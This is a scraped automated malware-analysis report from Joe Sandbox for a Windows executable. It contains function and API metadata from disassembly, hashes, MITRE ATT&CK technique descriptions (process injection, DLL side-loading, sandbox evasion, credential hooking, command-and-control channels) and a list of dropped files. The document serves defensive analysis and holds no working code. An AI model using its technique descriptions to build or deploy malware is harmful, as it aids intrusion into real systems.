Instruction Fuzzy Hash: A5515932A08A858AFB24EF65D0843ADB7A0FB44B88F544536EF4D17B55CFB8E159C720

Function 00007FF79EE6DE5C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF79EE6DF73
GetLastError.KERNEL32 ref: 00007FF79EE6DF95

Strings

U, xrefs: 00007FF79EE6DF1F

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: c5f31fbc844a7cafd3de29f5469a8b233e74ffb54cc7ca53e4d38f4a2b99adab
Instruction ID: db0cd21ced2c0970a6d1473d3735d7ef5c5261aa86c08c78433d0984668e1d06
Opcode Fuzzy Hash: c5f31fbc844a7cafd3de29f5469a8b233e74ffb54cc7ca53e4d38f4a2b99adab
Instruction Fuzzy Hash: 1341A222A18A8186EB20AF75E8843B9B761FB98B94FC44131EE4D87798DF7CD441C760

Function 00007FF79EE665F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF79EE66634
RaiseException.KERNEL32 ref: 00007FF79EE6667A

Strings

csm, xrefs: 00007FF79EE66667

Memory Dump Source

Source File: 00000007.00000002.2426725646.00007FF79EE61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF79EE60000, based on PE: true

Associated: 00000007.00000002.2426701300.00007FF79EE60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426752849.00007FF79EE71000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426776924.00007FF79EE7C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2426797120.00007FF79EE7E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff79ee60000_vIPphI.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 7c279ebb97aa25c5b12da2d02331ed8abb5be48b0b9a66ee5d23d8769e27c090
Instruction ID: 12a119fb9aa701c80c9862b591f937b8e3f87222d9f47a196b04ce578f7b02e6
Opcode Fuzzy Hash: 7c279ebb97aa25c5b12da2d02331ed8abb5be48b0b9a66ee5d23d8769e27c090
Instruction Fuzzy Hash: 83114F72A18B8182EB609F25F48026DB7A4FB88F84F584230DE8D07769DF7DD951CB10

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KHoDN.76532.10.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\d[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\c[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\i[1].dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\a[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\s[1].dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\b[1].gif

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\s[1].jpg

C:\Users\user\Documents\cache.dat

C:\Users\user\Documents\eToken.dll

C:\Users\user\Documents\perfi.db

C:\Users\user\Documents\vIPphI.exe

C:\Windows\Temp\aceprocted.sys

\Device\Mup\localhost\pipe\atsvc

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
KHoDN.76532.10.exe